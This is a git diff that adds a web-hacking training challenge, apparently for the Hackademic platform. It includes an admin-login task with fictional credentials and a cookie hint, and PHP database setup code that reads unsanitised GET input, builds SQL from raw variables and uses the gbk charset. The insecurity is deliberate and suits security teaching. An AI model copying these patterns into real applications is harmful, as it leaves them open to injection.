diff --git a/challenges/newchallenge4/inside/use-icon/gplus48_3.png b/challenges/newchallenge4/inside/use-icon/gplus48_3.png
new file mode 100755
index 00000000..9cc71349
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/gplus48_3.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/gplus48_4.png b/challenges/newchallenge4/inside/use-icon/gplus48_4.png
new file mode 100755
index 00000000..549ae0ed
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/gplus48_4.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/linkedin48_1.png b/challenges/newchallenge4/inside/use-icon/linkedin48_1.png
new file mode 100755
index 00000000..7a8e11ac
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/linkedin48_1.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/linkedin48_2.png b/challenges/newchallenge4/inside/use-icon/linkedin48_2.png
new file mode 100755
index 00000000..417514aa
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/linkedin48_2.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/linkedin48_3.png b/challenges/newchallenge4/inside/use-icon/linkedin48_3.png
new file mode 100755
index 00000000..9a77eef9
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/linkedin48_3.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/linkedin48_4.png b/challenges/newchallenge4/inside/use-icon/linkedin48_4.png
new file mode 100755
index 00000000..b35db457
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/linkedin48_4.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/linkedin_32.png b/challenges/newchallenge4/inside/use-icon/linkedin_32.png
new file mode 100755
index 00000000..9c009a52
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/linkedin_32.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/mail32.png b/challenges/newchallenge4/inside/use-icon/mail32.png
new file mode 100755
index 00000000..bf5a04fd
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/mail32.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/mail32_1.png b/challenges/newchallenge4/inside/use-icon/mail32_1.png
new file mode 100755
index 00000000..e80e9b08
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/mail32_1.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/msg_1png b/challenges/newchallenge4/inside/use-icon/msg_1png
new file mode 100755
index 00000000..c49221ad
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/msg_1png differ
diff --git a/challenges/newchallenge4/inside/use-icon/twitter48_1.png b/challenges/newchallenge4/inside/use-icon/twitter48_1.png
new file mode 100755
index 00000000..fa928111
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/twitter48_1.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/twitter48_2.png b/challenges/newchallenge4/inside/use-icon/twitter48_2.png
new file mode 100755
index 00000000..2a560776
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/twitter48_2.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/twitter48_3.png b/challenges/newchallenge4/inside/use-icon/twitter48_3.png
new file mode 100755
index 00000000..b8ab821d
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/twitter48_3.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/twitter48_4.png b/challenges/newchallenge4/inside/use-icon/twitter48_4.png
new file mode 100755
index 00000000..0bc14d99
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/twitter48_4.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/twitter_32.png b/challenges/newchallenge4/inside/use-icon/twitter_32.png
new file mode 100755
index 00000000..bbcc2cc2
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/twitter_32.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/facebook.png b/challenges/newchallenge4/inside/use-icons/facebook.png
new file mode 100755
index 00000000..5fb0213b
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/facebook.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/google.png b/challenges/newchallenge4/inside/use-icons/google.png
new file mode 100755
index 00000000..2942c7ea
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/google.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/linkedin.png b/challenges/newchallenge4/inside/use-icons/linkedin.png
new file mode 100755
index 00000000..ba6a753b
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/linkedin.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/submit.png b/challenges/newchallenge4/inside/use-icons/submit.png
new file mode 100755
index 00000000..7e35d6d5
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/submit.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/submit_check.png b/challenges/newchallenge4/inside/use-icons/submit_check.png
new file mode 100755
index 00000000..d8da4735
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/submit_check.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/twitter.png b/challenges/newchallenge4/inside/use-icons/twitter.png
new file mode 100755
index 00000000..9b81a0d6
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/twitter.png differ
diff --git a/challenges/newchallenge4/newchallenge4.xml b/challenges/newchallenge4/newchallenge4.xml
new file mode 100755
index 00000000..b6818b02
--- /dev/null
+++ b/challenges/newchallenge4/newchallenge4.xml
@@ -0,0 +1,17 @@
+
+
+ New Challenge 3
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Alexandros Papanikolaou
+
+ web
+
+ SITE. However, they have solved this to an extent and have MITM'd a regular user to get the following credentials { username : scrtusr & password : mint_cinnamon} however this bit of information isn't enough to get to the user's profile or to inject into the website to get admin login details . So, now you have to find out the admin credentials and hand it over to the government officials, so that they can carry out some security checks. Login as admin.
Hint : Wanna have a Cookie ??
+ ]]>
+
+
diff --git a/challenges/newchallenge4/sql-connections/db-creds.inc b/challenges/newchallenge4/sql-connections/db-creds.inc
new file mode 100755
index 00000000..cf303275
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/db-creds.inc
@@ -0,0 +1,10 @@
+
+
diff --git a/challenges/newchallenge4/sql-connections/functions.php b/challenges/newchallenge4/sql-connections/functions.php
new file mode 100755
index 00000000..aa92d095
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/functions.php
@@ -0,0 +1,91 @@
+
diff --git a/challenges/newchallenge4/sql-connections/setup-db-challenge.php b/challenges/newchallenge4/sql-connections/setup-db-challenge.php
new file mode 100755
index 00000000..09c225bc
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/setup-db-challenge.php
@@ -0,0 +1,80 @@
+
+
+
+
+
+
+
+";
+@error_reporting(0);
+if(isset($_GET['id']))
+$id = $_GET['id'];
+//echo $id;
+
+// Check connection
+@$con = mysql_connect($host,$dbuser,$dbpass);
+if (!$con)
+{
+ echo "Failed to connect to MySQL: " . mysql_error();
+}
+
+
+//purging Old Database for challenges
+ $sql="DROP DATABASE IF EXISTS $dbname1";
+ if (mysql_query($sql))
+ {echo "Old database purged if exists"; echo "
\n";}
+
+
+
+
+//Creating new database for challenges
+ $sql="CREATE database $dbname1 CHARACTER SET `gbk` ";
+ if (mysql_query($sql))
+ {echo "Creating New database successfully";echo "
\n";}
+
+
+// creating random key
+$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; //characterset for generating random data
+$sec_key = num_gen(24, $characters);
+$hash = md5(rand(0,100000));
+
+//inserting Dummy data into table
+$sql="INSERT INTO $dbname1.$table VALUES (1, '$hash', '$sec_key', 0)";
+ if (mysql_query($sql))
+ {echo "Inserted data correctly into table '$table'";echo "
\n";}
+
+
+
+//including the Challenges DB creation file.
+include("../sql-connections/setup-db-challenge.php");
+?>
+
+
+
+
+
+
diff --git a/challenges/newchallenge4/sql-connections/sql-connect-1.php b/challenges/newchallenge4/sql-connections/sql-connect-1.php
new file mode 100755
index 00000000..8b1f9ed3
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/sql-connect-1.php
@@ -0,0 +1,29 @@
+
+
+
+
+
+
diff --git a/challenges/newchallenge4/sql-connections/sql-connect.php b/challenges/newchallenge4/sql-connections/sql-connect.php
new file mode 100755
index 00000000..611c6b96
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/sql-connect.php
@@ -0,0 +1,34 @@
+
+
+
+
+
+
diff --git a/challenges/newchallenge4/sql-connections/sqli-connect.php b/challenges/newchallenge4/sql-connections/sqli-connect.php
new file mode 100755
index 00000000..82132e92
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/sqli-connect.php
@@ -0,0 +1,25 @@
+
+
+
+
+
+
diff --git a/challenges/newchallenge4/sql-connections/test.php b/challenges/newchallenge4/sql-connections/test.php
new file mode 100755
index 00000000..4c00cd27
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/test.php
@@ -0,0 +1,11 @@
+
diff --git a/composer.json b/composer.json
old mode 100644
new mode 100755
diff --git a/controller/class.ChallengeListController.php b/controller/class.ChallengeListController.php
old mode 100644
new mode 100755
diff --git a/controller/class.ChallengeMonitorController.php b/controller/class.ChallengeMonitorController.php
old mode 100644
new mode 100755
diff --git a/controller/class.ChallengeValidatorController.php b/controller/class.ChallengeValidatorController.php
old mode 100644
new mode 100755
diff --git a/controller/class.HackademicController.php b/controller/class.HackademicController.php
old mode 100644
new mode 100755
diff --git a/controller/class.LoginController.php b/controller/class.LoginController.php
old mode 100644
new mode 100755
diff --git a/controller/class.ProgressReportController.php b/controller/class.ProgressReportController.php
old mode 100644
new mode 100755
diff --git a/controller/class.RankingsController.php b/controller/class.RankingsController.php
old mode 100644
new mode 100755
diff --git a/controller/class.ReadArticleController.php b/controller/class.ReadArticleController.php
old mode 100644
new mode 100755
diff --git a/controller/class.ShowChallengeController.php b/controller/class.ShowChallengeController.php
old mode 100644
new mode 100755
diff --git a/controller/class.TryChallengeController.php b/controller/class.TryChallengeController.php
old mode 100644
new mode 100755
diff --git a/controller/index.php b/controller/index.php
old mode 100644
new mode 100755
diff --git a/docs/API docs - Actions.csv b/docs/API docs - Actions.csv
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Actions.md b/docs/Plugin-API-Actions.md
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Install.md b/docs/Plugin-API-Install.md
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Overview.md b/docs/Plugin-API-Overview.md
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Pages-and-Menus.md b/docs/Plugin-API-Pages-and-Menus.md
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Plugin.md b/docs/Plugin-API-Plugin.md
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Theme.md b/docs/Plugin-API-Theme.md
old mode 100644
new mode 100755
diff --git a/docs/docs.php b/docs/docs.php
old mode 100644
new mode 100755
diff --git a/docs/plugindocs.sql b/docs/plugindocs.sql
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/COPYING.lib b/extlib/Smarty-3.1.21/COPYING.lib
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/README b/extlib/Smarty-3.1.21/README
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/SMARTY_2_BC_NOTES.txt b/extlib/Smarty-3.1.21/SMARTY_2_BC_NOTES.txt
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/SMARTY_3.0_BC_NOTES.txt b/extlib/Smarty-3.1.21/SMARTY_3.0_BC_NOTES.txt
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/SMARTY_3.1_NOTES.txt b/extlib/Smarty-3.1.21/SMARTY_3.1_NOTES.txt
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/change_log.txt b/extlib/Smarty-3.1.21/change_log.txt
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/configs/test.conf b/extlib/Smarty-3.1.21/demo/configs/test.conf
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/index.php b/extlib/Smarty-3.1.21/demo/index.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/cacheresource.apc.php b/extlib/Smarty-3.1.21/demo/plugins/cacheresource.apc.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/cacheresource.memcache.php b/extlib/Smarty-3.1.21/demo/plugins/cacheresource.memcache.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/cacheresource.mysql.php b/extlib/Smarty-3.1.21/demo/plugins/cacheresource.mysql.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/resource.extendsall.php b/extlib/Smarty-3.1.21/demo/plugins/resource.extendsall.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/resource.mysql.php b/extlib/Smarty-3.1.21/demo/plugins/resource.mysql.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/resource.mysqls.php b/extlib/Smarty-3.1.21/demo/plugins/resource.mysqls.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/templates/footer.tpl b/extlib/Smarty-3.1.21/demo/templates/footer.tpl
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/templates/header.tpl b/extlib/Smarty-3.1.21/demo/templates/header.tpl
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/templates/index.tpl b/extlib/Smarty-3.1.21/demo/templates/index.tpl
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/Smarty.class.php b/extlib/Smarty-3.1.21/libs/Smarty.class.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/SmartyBC.class.php b/extlib/Smarty-3.1.21/libs/SmartyBC.class.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/debug.tpl b/extlib/Smarty-3.1.21/libs/debug.tpl
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/block.textformat.php b/extlib/Smarty-3.1.21/libs/plugins/block.textformat.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.counter.php b/extlib/Smarty-3.1.21/libs/plugins/function.counter.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.cycle.php b/extlib/Smarty-3.1.21/libs/plugins/function.cycle.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.fetch.php b/extlib/Smarty-3.1.21/libs/plugins/function.fetch.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_checkboxes.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_checkboxes.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_image.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_image.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_options.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_options.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_radios.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_radios.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_select_date.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_select_date.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_select_time.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_select_time.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_table.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_table.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.locale.php b/extlib/Smarty-3.1.21/libs/plugins/function.locale.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.mailto.php b/extlib/Smarty-3.1.21/libs/plugins/function.mailto.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.math.php b/extlib/Smarty-3.1.21/libs/plugins/function.math.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.capitalize.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.capitalize.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.date_format.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.date_format.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.debug_print_var.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.debug_print_var.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.escape.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.escape.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.regex_replace.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.regex_replace.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.replace.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.replace.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.spacify.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.spacify.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.truncate.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.truncate.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.cat.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.cat.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_characters.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_characters.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_paragraphs.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_paragraphs.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_sentences.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_sentences.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_words.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_words.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.default.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.default.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.escape.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.escape.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.from_charset.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.from_charset.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.indent.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.indent.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.lower.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.lower.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.noprint.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.noprint.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.string_format.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.string_format.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.strip.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.strip.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.strip_tags.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.strip_tags.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.to_charset.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.to_charset.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.unescape.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.unescape.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.upper.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.upper.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.wordwrap.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.wordwrap.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/outputfilter.trimwhitespace.php b/extlib/Smarty-3.1.21/libs/plugins/outputfilter.trimwhitespace.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.escape_special_chars.php b/extlib/Smarty-3.1.21/libs/plugins/shared.escape_special_chars.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.literal_compiler_param.php b/extlib/Smarty-3.1.21/libs/plugins/shared.literal_compiler_param.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.make_timestamp.php b/extlib/Smarty-3.1.21/libs/plugins/shared.make_timestamp.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.mb_str_replace.php b/extlib/Smarty-3.1.21/libs/plugins/shared.mb_str_replace.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.mb_unicode.php b/extlib/Smarty-3.1.21/libs/plugins/shared.mb_unicode.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.mb_wordwrap.php b/extlib/Smarty-3.1.21/libs/plugins/shared.mb_wordwrap.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/variablefilter.htmlspecialchars.php b/extlib/Smarty-3.1.21/libs/plugins/variablefilter.htmlspecialchars.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource_custom.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource_custom.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource_keyvaluestore.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource_keyvaluestore.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_config_source.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_config_source.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_cacheresource_file.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_cacheresource_file.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_append.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_append.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_assign.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_assign.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_block.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_block.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_break.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_break.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_call.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_call.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_capture.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_capture.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_config_load.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_config_load.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_continue.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_continue.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_debug.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_debug.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_eval.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_eval.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_extends.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_extends.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_for.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_for.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_foreach.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_foreach.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_function.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_function.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_if.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_if.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_include.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_include.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_include_php.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_include_php.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_insert.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_insert.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_ldelim.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_ldelim.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_nocache.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_nocache.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_block_plugin.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_block_plugin.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_function_plugin.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_function_plugin.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_modifier.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_modifier.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_object_block_function.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_object_block_function.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_object_function.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_object_function.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_print_expression.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_print_expression.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_registered_block.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_registered_block.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_registered_function.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_registered_function.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_special_variable.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_special_variable.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_rdelim.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_rdelim.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_section.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_section.php
old mode 100644
new mode 100755
